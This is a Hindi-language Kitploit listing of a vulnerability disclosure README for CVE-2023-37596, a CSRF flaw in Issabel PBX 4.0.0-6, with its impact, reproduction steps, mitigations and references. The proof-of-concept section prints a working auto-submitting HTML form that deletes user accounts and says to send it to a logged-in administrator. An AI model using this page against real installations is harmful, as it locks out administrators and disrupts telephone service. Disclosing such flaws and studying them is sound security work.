Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-37596 — CVE-2023-37596 Issabel PBX संस्करण 4.0.0-6 में खोजी गई एक क्रॉस-साइट रिक्वेस्ट फोर्जरी (CSRF) भेद्यता है, जो एक व्यापक रूप से उपयोग किया जाने वाला ओपन-सोर्स यूनिफाइड कम्युनिकेशंस प्लेटफ़ॉर्म है। | Kitploit
उपकरण/GitHubGitHub/sahiloj/cve-2023-37596
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubsahiloj/cve-2023-37596

CVE-2023-37596

CVE-2023-37596 Issabel PBX संस्करण 4.0.0-6 में खोजी गई एक क्रॉस-साइट रिक्वेस्ट फोर्जरी (CSRF) भेद्यता है, जो एक व्यापक रूप से उपयोग किया जाने वाला ओपन-सोर्स यूनिफाइड कम्युनिकेशंस प्लेटफ़ॉर्म है।

रिपॉजिटरी देखें
1116 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2023-37596 — issabel-pbx 4.0.0-6: क्रॉस-साइट रिक्वेस्ट फोर्जरी (CSRF) — किसी भी उपयोगकर्ता को हटाएं

गंभीरता: उच्च  |  CVSS v3.1: 8.1 (AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H)  |  CWE: CWE-352


विषय सूची

  • अवलोकन
  • भेद्यता विवरण
  • प्रभाव
  • प्रभावित संस्करण
  • हमला परिदृश्य
  • प्रमाण अवधारणा (पुनरुत्पादन के चरण)
  • शमन / उपचार
  • संदर्भ
  • प्रकटीकरण समयरेखा
  • लेखक

अवलोकन

एक क्रॉस-साइट रिक्वेस्ट फोर्जरी (CSRF) भेद्यता Issabel PBX संस्करण 4.0.0-6 में खोजी गई थी। उपयोगकर्ता प्रबंधन समापन बिंदु किसी भी CSRF सुरक्षा को लागू नहीं करता है, जो एक अनधिकृत रिमोट हमलावर को एक दुर्भावनापूर्ण वेब पेज तैयार करने की अनुमति देता है — जो जब एक प्रमाणित Issabel व्यवस्थापक द्वारा देखा जाता है — चुपचाप सिस्टम से किसी भी उपयोगकर्ता खाते को हटा देता है। बार-बार शोषण सभी प्रशासनिक उपयोगकर्ताओं को हटाकर पूरे एप्लिकेशन को दुर्गम बना सकता है।


भेद्यता विवरण

क्षेत्रमान
CVE IDCVE-2023-37596
भेद्यता प्रकारक्रॉस-साइट रिक्वेस्ट फोर्जरी (CSRF)
CWECWE-352
उत्पादIssabel PBX
कमजोर संस्करण4.0.0-6
विक्रेता होमपेजhttps://www.issabel.org/
सॉफ्टवेयर रिपॉजिटरीhttps://github.com/IssabelFoundation/issabelPBX
परीक्षण किया गयाWindows
CVE प्रकाशित10/07/2023
द्वारा खोजा गयाSahil Ojha

प्रभाव

क्योंकि Issabel PBX अपने उपयोगकर्ता-प्रबंधन इंटरफ़ेस पर स्थिति-बदलने वाले अनुरोधों के मूल को मान्य नहीं करता है, एक सफल CSRF हमला हमलावर को अनुमति देता है:

  • किसी भी उपयोगकर्ता खाते को हटाएं — प्राथमिक व्यवस्थापक सहित — पीड़ित की जानकारी के बिना।
  • सेवा से इनकार (DoS) का कारण बनें — सभी उपयोगकर्ताओं को हटाकर, कोई भी लॉग इन नहीं कर सकता, जिससे PBX प्रशासन पैनल पूरी तरह से दुर्गम हो जाता है।
  • टेलीफोनी सेवाओं को बाधित करें — फोन सिस्टम कॉन्फ़िगरेशन और प्रबंधन तब तक अनुपलब्ध हो जाता है जब तक कि सर्वर स्तर पर खाता मैन्युअल रूप से पुनर्प्राप्त नहीं किया जाता।

प्रभावित संस्करण

उत्पादप्रभावित संस्करणस्थिति
issabel-pbx4.0.0-6असुरक्षित

हमला परिदृश्य

एक हमलावर एक दुर्भावनापूर्ण HTML पेज होस्ट करता है जिसमें Issabel PBX एप्लिकेशन के डिलीट-यूज़र एंडपॉइंट को लक्षित करने वाला एक जाली HTTP अनुरोध होता है। हमला स्वचालित रूप से (या बटन क्लिक पर) ट्रिगर होता है जब कोई उपयोगकर्ता जो Issabel में पहले से प्रमाणित है, उसी ब्राउज़र में दुर्भावनापूर्ण पेज पर जाता है। क्योंकि ब्राउज़र स्वचालित रूप से प्रत्येक अनुरोध के साथ पीड़ित के सत्र कुकीज़ शामिल करता है, सर्वर जाली विलोपन अनुरोध को वैध मान लेता है।

हमलावर की ओर से किसी विशेष विशेषाधिकार की आवश्यकता नहीं है — केवल एक सोशल-इंजीनियरिंग वेक्टर (फ़िशिंग लिंक, दुर्भावनापूर्ण विज्ञापन, आदि) जो प्रमाणित व्यवस्थापक को तैयार किए गए पेज पर लुभाने के लिए होता है।

इस हमले की प्रमुख विशेषताएं:

  • हमलावर की ओर से कोई प्रमाणीकरण आवश्यक नहीं।
  • एक क्लिक (या यदि `` / ऑटो-सबमिट फॉर्म का उपयोग किया जाए तो शून्य क्लिक भी) शोषण को ट्रिगर करने के लिए पर्याप्त है।
  • कोई भी उपयोगकर्ता आईडी (जैसे, id=1, id=2, …) पेलोड को संशोधित करके लक्षित किया जा सकता है।
  • हमला पीड़ित के लिए अदृश्य होता है; पेज चुपचाप जाली अनुरोध सबमिट करते हुए असंबंधित सामग्री प्रदर्शित कर सकता है।

प्रमाण अवधारणा (पुनरुत्पादन के चरण)

पूर्वापेक्षाएँ

  • Burp Suite (सामुदायिक या व्यावसायिक संस्करण)
  • Burp Suite के माध्यम से ट्रैफ़िक प्रॉक्सी करने के लिए कॉन्फ़िगर किया गया एक ब्राउज़र
  • नेटवर्क पर पहुंच योग्य एक Issabel PBX 4.0.0-6 इंस्टेंस

चरण 1 — व्यवस्थापक के रूप में लॉग इन करें

Issabel PBX उपयोगकर्ता सूची पृष्ठ पर जाएं और व्यवस्थापक क्रेडेंशियल्स के साथ प्रमाणित करें:

root@kitploit:~
https://<Issabel-IP>/index.php?menu=userlist

चरण 1 — Issabel PBX उपयोगकर्ता सूची


चरण 2 — Burp Suite में डिलीट-यूज़र अनुरोध कैप्चर करें

  1. Burp Suite प्रॉक्सी सक्रिय होने पर, लक्ष्य उपयोगकर्ता के बगल में हटाएं बटन पर क्लिक करें।
  2. Burp Suite के प्रॉक्सी → HTTP इतिहास में, कैप्चर किए गए DELETE/POST अनुरोध का पता लगाएं।
  3. अनुरोध पर राइट-क्लिक करें और Engagement Tools → Generate CSRF PoC चुनें।

चरण 2 — Burp Suite में विलोपन अनुरोध कैप्चर करना


चरण 3 — CSRF शोषण उत्पन्न करें और सहेजें

Burp Suite नीचे दिए गए समान एक HTML पेज तैयार करेगा। इसे .html फ़ाइल के रूप में सहेजें (जैसे, csrf_exploit.html):

root@kitploit:~
<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <form action="https://<Issabel-IP>/index.php?menu=userlist" method="POST">
      <input type="hidden" name="action" value="delete" />
      <input type="hidden" name="id" value="1" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      // Auto-submit the form as soon as the page loads
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>

नोट: <Issabel-IP> को लक्ष्य सर्वर के IP पते या होस्टनाम से बदलें, और किसी भिन्न उपयोगकर्ता खाते को लक्षित करने के लिए id मान समायोजित करें।


चरण 4 — प्रमाणित व्यवस्थापक को शोषण वितरित करें

csrf_exploit.html फ़ाइल (या जहां यह होस्ट किया गया है उसका लिंक) उस उपयोगकर्ता को भेजें जो वर्तमान में Issabel PBX में लॉग इन है। जब पीड़ित पेज खोलता है, तो फॉर्म स्वचालित रूप से सबमिट हो जाता है और लक्ष्य उपयोगकर्ता बिना किसी पुष्टिकरण संकेत के हटा दिया जाता है।

चरण 4 — CSRF शोषण निष्पादित, उपयोगकर्ता हटा दिया गया

चरण 4 — पुष्टि कि उपयोगकर्ता हटा दिया गया है


शमन / उपचार

इस भेद्यता को ठीक करने के लिए विक्रेता और/या सिस्टम प्रशासकों द्वारा निम्नलिखित सुरक्षा उपाय लागू किए जाने चाहिए:

  1. CSRF टोकन लागू करें — क्रिप्टोग्राफिक रूप से यादृच्छिक, प्रति-सत्र (या प्रति-अनुरोध) टोकन उत्पन्न करें और प्रत्येक स्थिति-बदलने वाले अनुरोध के लिए इसे सर्वर-साइड मान्य करें। जिन अनुरोधों में मान्य टोकन नहीं है, उन्हें अस्वीकार किया जाना चाहिए।

  2. SameSite कुकी विशेषता — सत्र कुकी की SameSite विशेषता को Strict या Lax पर सेट करें ताकि अधिकांश ब्राउज़रों में क्रॉस-ओरिजिन अनुरोधों द्वारा सत्र कुकी ले जाने से रोका जा सके।

  3. Origin / Referer हेडर सत्यापित करें — सर्वर साइड पर, किसी भी स्थिति-बदलने वाले अनुरोध को अस्वीकार करें जिसका Origin या Referer हेडर एप्लिकेशन के अपने डोमेन से मेल नहीं खाता।

  4. विनाशकारी कार्यों के लिए पुन: प्रमाणीकरण आवश्यक करें — उपयोगकर्ता खातों को हटाने जैसे अपरिवर्तनीय कार्यों को संसाधित करने से पहले उपयोगकर्ता को अपना पासवर्ड फिर से दर्ज करने के लिए प्रेरित करें।

  5. न्यूनतम विशेषाधिकार के सिद्धांत को लागू करें — सुनिश्चित करें कि केवल स्पष्ट व्यवस्थापक भूमिका वाले उपयोगकर्ता ही उपयोगकर्ता-विलोपन कार्यक्षमता तक पहुंच सकें, जिससे सफल हमले के विस्फोट त्रिज्या को कम किया जा सके।

जब तक विक्रेता पैच उपलब्ध नहीं हो जाता, प्रशासकों को सलाह दी जाती है:

  • फ़ायरवॉल नियमों के माध्यम से Issabel PBX प्रशासन पैनल तक पहुंच को विश्वसनीय IP पतों तक सीमित करें।
  • व्यवस्थापक पैनल में लॉग इन रहते हुए अविश्वसनीय वेबसाइटों पर ब्राउज़ करने से बचें।

संदर्भ

  • NVD — CVE-2023-37596
  • OWASP — क्रॉस-साइट रिक्वेस्ट फोर्जरी (CSRF)
  • CWE-352: क्रॉस-साइट रिक्वेस्ट फोर्जरी (CSRF)
  • Issabel PBX आधिकारिक वेबसाइट
  • GitHub पर IssabelFoundation/issabelPBX
  • PortSwigger — CSRF

प्रकटीकरण समयरेखा

तारीखघटना
10/07/2023भेद्यता खोजी गई और रिपोर्ट की गई
10/07/2023CVE-2023-37596 असाइन किया गया

लेखक

Sahil Ojha

  • सुरक्षा शोधकर्ता
  • CVE: CVE-2023-37596

अस्वीकरण: यह रिपॉजिटरी केवल शैक्षिक और जिम्मेदार प्रकटीकरण उद्देश्यों के लिए प्रकाशित की गई है। यहां प्रदान की गई जानकारी का उपयोग सिस्टम स्वामी से स्पष्ट लिखित अनुमति के बिना सिस्टम पर हमला करने के लिए नहीं किया जाना चाहिए। लेखक इस जानकारी के किसी भी दुरुपयोग के लिए कोई जिम्मेदारी नहीं लेता है।

टूल डाउनलोड करें